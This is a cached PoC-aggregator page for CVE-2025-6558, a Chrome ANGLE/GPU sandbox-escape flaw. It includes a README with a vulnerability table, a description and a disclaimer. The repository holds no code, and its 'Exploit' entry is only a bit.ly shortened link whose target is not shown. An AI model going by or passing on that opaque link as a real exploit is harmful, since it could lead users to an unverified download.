Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-6558 PoC — Google Chrome 输入验证错误漏洞

Source
Associated Vulnerability
Title:Google Chrome 输入验证错误漏洞 (CVE-2025-6558)
Description:Google Chrome是美国谷歌(Google)公司的一款Web浏览器。 Google Chrome 138.0.7204.157之前版本存在安全漏洞,该漏洞源于ANGLE和GPU对不可信输入验证不足,可能导致沙箱逃逸。
Readme
# **CVE-2025-6558 - Google Chrome ANGLE/GPU Sandbox Escape**  

| **Field**         | **Details**                                                                 |
|-------------------|-----------------------------------------------------------------------------|
| **CVE ID**        | CVE-2025-6558                                                               |
| **Vulnerability Type** | Sandbox Escape                                                           |
| **Affected Application** | Google Chrome (ANGLE and GPU components)                                |
| **Severity**      | Critical – Enables remote arbitrary code execution and access to sensitive resources |
| **Affected Versions** | Google Chrome versions < `138.0.7204.157`                                 |
| **Exploitation Prerequisites** | User visits a webpage containing malicious WebGL/HTML content          |
| **POC Availability** | Confirmed                                                                 |

---

## Description
CVE-2025-6558 is a critical sandbox escape vulnerability in Google Chrome’s **ANGLE** (Almost Native Graphics Layer Engine) and **GPU components**. Insufficient validation of untrusted inputs in ANGLE/GPU processing allows remote attackers to craft malicious HTML pages that trigger this flaw.

## ⚠️ Disclaimer

This content is provided for **educational and research purposes** only.  
The author does **not condone** malicious activity or exploitation of systems without **explicit authorization**.

---

### Exploit
[**href**](http://bit.ly/4lAFDak)


File Snapshot

[4.0K] /data/pocs/24af1a3bf4e07946000381c727d8830291ba5dca └── [1.5K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.